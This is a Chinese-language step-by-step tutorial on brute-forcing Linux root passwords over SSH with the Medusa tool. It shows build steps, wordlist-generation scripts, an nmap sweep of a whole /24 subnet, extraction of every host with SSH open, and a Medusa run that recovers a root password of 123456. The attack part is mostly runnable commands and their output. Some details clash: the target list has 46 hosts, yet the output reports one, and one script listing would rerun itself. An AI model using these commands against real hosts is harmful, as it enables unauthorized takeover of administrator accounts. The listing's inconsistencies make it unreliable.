############################################################
#暴力破解linux超级管理员root帐号密码medusa使用方法整理:
#
#By:nortorm
#
###########################################################
#准备工作:(下载下面软件)
   1 wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz
   2 wget http://www.libssh2.org/download/libssh2-1.2.6.tar.gz
   3 字典库的问题(此处用mkpasswd举例)

#正文:
首先安装libssh2-1.2.6.tar.gz
   tar -zxvf libssh2-1.2.6.tar.gz -C /usr/src/
   cd /usr/src/libssh2-1.2.6/
   ./configure ; make ; make install

接着安装medusa-2.0.tar.gz
   tar -zxvf medusa-2.0.tar.gz -C /usr/src/
   cd /usr/src/medusa-2.0/
   ./configure --prefix=$HOME/medusa-2.0 --enable-debug=yes --enable-module-afp=yes --enable-module-cvs=yes --enable-module-ftp=yes --enable-module-http=yes --enable-module-imap=yes --enable-module-mssql=yes --enable-module-mysql=yes --enable-module-ncp=yes --enable-module-nntp=yes --enable-module-pcanywhere=yes --enable-module-pop3=yes --enable-module-postgres=yes --enable-module-rexec=yes --enable-module-rlogin=yes --enable-module-rsh=yes --enable-module-smbnt=yes --enable-module-smtp=yes --enable-module-smtp-vrfy=yes --enable-module-snmp=yes --enable-module-ssh=yes --enable-module-svn=yes --enable-module-telnet=yes --enable-module-vmauthd=yes --enable-module-vnc=yes --enable-module-wrapper=yes --enable-module-web-form=yes
   make ; make install

#字典库 (此处是针对密码特别复杂的情况讨论的,我这里做实验用不到这么复杂。)
[root@www ~]# cat mkpasswd.sh
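#!/bin/bash
# Generate a wordlist by running mkpasswd 10000 times and appending each
# 8-character result to /windows/mkpasswd.txt.
# NOTE(review): the -l/-d/-c/-C/-s usage text later in this page belongs to the
# expect-based mkpasswd generator; other tools named mkpasswd (e.g. the one in
# the whois package) hash a given password instead — confirm which is installed.
# The original listing had trailing "--..." annotations on the code lines; they
# are not shell comments and would have been passed to the commands, so they
# are rewritten as real comments here.
set -eu

# Where the generated passwords go; the /windows directory must already exist.
readonly out=/windows/mkpasswd.txt
touch -- "$out"

# Bash arithmetic loop instead of `seq` in backticks: no extra process, and
# set -e stops on the first mkpasswd failure instead of silently appending
# nothing 10000 times.
for ((i = 1; i <= 10000; i++)); do
  mkpasswd -l 8 >>"$out"
done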

下面来简单介绍一下常用的参数含义:(man mkpasswd)
[root@www ~]# mkpasswd
oO@0thWi8
[root@www ~]# mkpasswd -l 8
d63tL(aT
[root@www ~]# mkpasswd -l 8 -d 3
8:nnV76W
[root@www ~]# mkpasswd -l 8 -c 2
STm[zj30
[root@www ~]# mkpasswd -l 8 -s 2
Nus8}\6E
[root@www ~]# mkpasswd -l 8 -s 2 -c 2 -C 2
e&{HN26d


usage: mkpasswd [args] [user]

where arguments are:

-l #      (length of password, default = 9)          指定密码的长度,默认是9位数

-d #      (min # of digits, default = 2)             指定密码中数字最少位数,默认是2位

-c #      (min # of lowercase chars, default = 2)    指定密码中小写字母最少位数,默认是2位

-C #      (min # of uppercase chars, default = 2)    指定密码中大写字母最少位数,默认是2位

-s #      (min # of special chars, default = 1)      指定密码中特殊字符最少位数,默认是1位

-v        (verbose, show passwd interaction)         显示详细信息(显示生成密码时的 passwd 交互过程)


#软件使用步骤:

[root@www ~]# medusa
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
 -h [TEXT]       : Target hostname or IP address
 -H [FILE]         : File containing target hostnames or IP addresses
 -u [TEXT]       : Username to test
 -U [FILE]         : File containing usernames to test
 -p [TEXT]       : Password to test
 -P [FILE]         : File containing passwords to test
 -C [FILE]        : File containing combo entries. See README for more information.
 -O [FILE]        : File to append log information to
 -e [n/s/ns]     : Additional password checks ([n] No Password, [s] Password = Username)
 -M [TEXT]     : Name of the module to execute (without the .mod extension)
 -m [TEXT]     : Parameter to pass to the module. This can be passed multiple times with a
                        different parameter each time and they will all be sent to the module (i.e.
                       -m Param1 -m Param2, etc.)
 -d                  : Dump all known modules
 -n [NUM]      : Use for non-default TCP port number
 -s                   : Enable SSL
 -g [NUM]      : Give up after trying to connect for NUM seconds (default 3)
 -r [NUM]       : Sleep NUM seconds between retry attempts (default 3)
 -R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
 -c [NUM]      : Time to wait in usec to verify socket is available (default 500 usec).
 -t [NUM]      : Total number of logins to be tested concurrently
 -T [NUM]     : Total number of hosts to be tested concurrently
 -L                : Parallelize logins using one username per thread. The default is to process
                    the entire username before proceeding.
 -f                 : Stop scanning host after first valid username/password found.
 -F                : Stop audit after first valid username/password found on any host.
 -b                : Suppress startup banner
 -q                : Display module's usage information
 -v [NUM]     : Verbose level [0 - 6 (more)]
 -w [NUM]     : Error debug level [0 - 10 (more)]
 -V           : Display version
 -Z [TEXT]    : Resume scan based on map of previous scan

以上输出显示的是 medusa 各参数的使用说明。

[root@www ~]# medusa -d
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

 Available modules in "." :

 Available modules in "/usr/local/lib/medusa/modules" :
   + afp.mod : Brute force module for AFP sessions : version 2.0 (No usable LIBAFPFS. Module disabled.)
   + cvs.mod : Brute force module for CVS sessions : version 2.0
   + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
   + http.mod : Brute force module for HTTP : version 2.0
   + imap.mod : Brute force module for IMAP sessions : version 2.0
   + mssql.mod : Brute force module for M$-SQL sessions : version 2.0
   + mysql.mod : Brute force module for MySQL sessions : version 2.0
   + ncp.mod : Brute force module for NCP sessions : version 2.0 (No usable LIBNCP. Module disabled.)
   + nntp.mod : Brute force module for NNTP sessions : version 2.0
   + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
   + pop3.mod : Brute force module for POP3 sessions : version 2.0
   + postgres.mod : Brute force module for PostgreSQL sessions : version 2.0 (No usable LIBPQ. Module disabled.)
   + rexec.mod : Brute force module for REXEC sessions : version 2.0
   + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
   + rsh.mod : Brute force module for RSH sessions : version 2.0
   + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
   + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
   + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
   + snmp.mod : Brute force module for SNMP Community Strings : version 2.1
   + ssh.mod : Brute force module for SSH v2 sessions : version 2.0                               --关键是这个模块要加载成功,才能做我们的实验
   + svn.mod : Brute force module for Subversion sessions : version 2.0 (No usable LIBSVN. Module disabled.)
   + telnet.mod : Brute force module for telnet sessions : version 2.0
   + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
   + vnc.mod : Brute force module for VNC sessions : version 2.1
   + web-form.mod : Brute force module for web forms : version 2.1
   + wrapper.mod : Generic Wrapper Module : version 2.0

这些信息显示 medusa 已加载的协议模块;其中标注 "Module disabled" 的模块(afp、ncp、postgres、svn)因编译时缺少相应的库而不可用。

下面开始分析我们需要的主机IP

[root@www ~]# nmap -sV -p22 -oG ssh 172.16.2.0/24  

扫描 172.16.2.0/24 整个网段中 22 端口开放的机器,同时识别服务版本,并以可 grep 的格式(-oG)保存到 ssh 文件中。


需要用到nmap工具,nmap用到的几个参数概析:
usage:nmap

-sV  服务版本

-p22 表示22号端口

-oG  表示以可 grep 的格式(grepable)将输出结果保存到指定文件


[root@www ~]# cat ssh
# Nmap 5.51 scan initiated Tue Dec  3 17:09:29 2013 as: nmap -sV -p22 -oG ssh 172.16.2.0/24
Host: 172.16.2.1 ()    Status: Up
Host: 172.16.2.1 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.2 ()    Status: Up
Host: 172.16.2.2 ()    Ports: 22/closed/tcp//ssh///
Host: 172.16.2.3 ()    Status: Up
Host: 172.16.2.3 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.8 ()    Status: Up
Host: 172.16.2.8 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.9 ()    Status: Up
Host: 172.16.2.9 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.13 ()    Status: Up
Host: 172.16.2.13 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.17 ()    Status: Up
Host: 172.16.2.17 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.23 ()    Status: Up
Host: 172.16.2.23 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.25 ()    Status: Up
Host: 172.16.2.25 ()    Ports: 22/open/tcp//ssh//Dropbear sshd 2012.55 (protocol 2.0)/
Host: 172.16.2.27 ()    Status: Up
Host: 172.16.2.27 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.31 ()    Status: Up
Host: 172.16.2.31 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.34 ()    Status: Up
Host: 172.16.2.34 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.35 ()    Status: Up
Host: 172.16.2.35 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.39 ()    Status: Up
Host: 172.16.2.39 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.58 ()    Status: Up
Host: 172.16.2.58 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.61 ()    Status: Up
Host: 172.16.2.61 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.64 ()    Status: Up
Host: 172.16.2.64 ()    Ports: 22/closed/tcp//ssh///
Host: 172.16.2.66 ()    Status: Up
Host: 172.16.2.66 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.80 ()    Status: Up
Host: 172.16.2.80 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.95 ()    Status: Up
Host: 172.16.2.95 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.119 ()    Status: Up
Host: 172.16.2.119 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.120 ()    Status: Up
Host: 172.16.2.120 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.121 ()    Status: Up
Host: 172.16.2.121 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.122 ()    Status: Up
Host: 172.16.2.122 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.128 ()    Status: Up
Host: 172.16.2.128 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.132 ()    Status: Up
Host: 172.16.2.132 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.133 ()    Status: Up
Host: 172.16.2.133 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.134 ()    Status: Up
Host: 172.16.2.134 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.135 ()    Status: Up
Host: 172.16.2.135 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.137 ()    Status: Up
Host: 172.16.2.137 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.138 ()    Status: Up
Host: 172.16.2.138 ()    Ports: 22/closed/tcp//ssh///
Host: 172.16.2.139 ()    Status: Up
Host: 172.16.2.139 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.144 ()    Status: Up
Host: 172.16.2.144 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.147 ()    Status: Up
Host: 172.16.2.147 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.150 ()    Status: Up
Host: 172.16.2.150 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.151 ()    Status: Up
Host: 172.16.2.151 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.165 ()    Status: Up
Host: 172.16.2.165 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.166 ()    Status: Up
Host: 172.16.2.166 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.170 (www.nortorm.com)    Status: Up
Host: 172.16.2.170 (www.nortorm.com)    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.177 ()    Status: Up
Host: 172.16.2.177 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.179 ()    Status: Up
Host: 172.16.2.179 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.181 ()    Status: Up
Host: 172.16.2.181 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.194 ()    Status: Up
Host: 172.16.2.194 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.196 ()    Status: Up
Host: 172.16.2.196 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.197 ()    Status: Up
Host: 172.16.2.197 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.200 ()    Status: Up
Host: 172.16.2.200 ()    Ports: 22/closed/tcp//ssh///
Host: 172.16.2.201 ()    Status: Up
Host: 172.16.2.201 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.203 ()    Status: Up
Host: 172.16.2.203 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.211 ()    Status: Up
Host: 172.16.2.211 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.218 ()    Status: Up
Host: 172.16.2.218 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.220 ()    Status: Up
Host: 172.16.2.220 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.222 ()    Status: Up
Host: 172.16.2.222 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.227 ()    Status: Up
Host: 172.16.2.227 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.228 ()    Status: Up
Host: 172.16.2.228 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.229 ()    Status: Up
Host: 172.16.2.229 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.237 ()    Status: Up
Host: 172.16.2.237 ()    Ports: 22/closed/tcp//ssh///
Host: 172.16.2.240 ()    Status: Up
Host: 172.16.2.240 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.241 ()    Status: Up
Host: 172.16.2.241 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.245 ()    Status: Up
Host: 172.16.2.245 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.247 ()    Status: Up
Host: 172.16.2.247 ()    Ports: 22/filtered/tcp//ssh///
# Nmap done at Tue Dec  3 17:10:03 2013 -- 256 IP addresses (60 hosts up) scanned in 34.17 seconds

将上面结果中 22 端口为 open 的主机 IP 提取出来,整理到 ssh1.txt

[root@www ~]# grep 22/open ssh |awk '{print $2}' >>ssh1.txt


[root@www ~]# cat ssh1.txt
172.16.2.1
172.16.2.3
172.16.2.8
172.16.2.9
172.16.2.17
172.16.2.25
172.16.2.27
172.16.2.31
172.16.2.34
172.16.2.35
172.16.2.58
172.16.2.61
172.16.2.66
172.16.2.80
172.16.2.95
172.16.2.119
172.16.2.120
172.16.2.121
172.16.2.122
172.16.2.128
172.16.2.132
172.16.2.134
172.16.2.135
172.16.2.137
172.16.2.139
172.16.2.144
172.16.2.151
172.16.2.165
172.16.2.166
172.16.2.170
172.16.2.179
172.16.2.181
172.16.2.194
172.16.2.196
172.16.2.197
172.16.2.203
172.16.2.211
172.16.2.218
172.16.2.220
172.16.2.222
172.16.2.227
172.16.2.228
172.16.2.229
172.16.2.240
172.16.2.241
172.16.2.245

下面我自己手动创建一个密码字典(你也可以自己去网上找更好的字典),以脚本的方式运行:
vim mkpasswd.sh

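#!/bin/bash
#
# Test wordlist: five random numbers, the known lab password 123456 as the
# 6th line, then five more random numbers, appended to ./passwd.txt.
# The original listing carried inline "--..." annotations after the
# redirections; those were extra arguments to echo and would have ended up in
# the file, so they are rewritten as real comments here.
#
set -eu

readonly out=passwd.txt
touch -- "$out"

# $RANDOM expands to a fresh pseudo-random integer (0..32767) on each use;
# printf instead of echo so the value is written verbatim.
for ((n = 0; n < 5; n++)); do
  printf '%s\n' "$RANDOM" >>"$out"
done
# The author's real password for the lab machine, placed in the middle.
printf '%s\n' 123456 >>"$out"
for ((n = 0; n < 5; n++)); do
  printf '%s\n' "$RANDOM" >>"$out"
done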

chmod +x mkpasswd.sh
./mkpasswd.sh

会自动生成我的测试字典 passwd.txt

[root@www ~]# vim passwd.txt
[root@www ~]# vim mkpasswd.sh
[root@www ~]# chmod +x mkpasswd.sh
[root@www ~]# ./mkpasswd.sh
[root@www ~]# cat passwd.txt
3652
16777
10723
3963
25439
123456
29718
25915
1151
20323
9717




下面开始最重要的环节:密码破解。

[root@www ~]# medusa -H ssh1.txt -u root -P passwd.txt -M ssh
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 3652 (1 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 16777 (2 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 10723 (3 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 3963 (4 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 25439 (5 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (6 of 11 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.2.170 User: root Password: 123456 [SUCCESS] --此处表示破解成功

当然这个过程是很慢的... 跟你的机器、网络、字典条目,以及目标 sshd 对认证次数和连接速率的限制等等都有关系。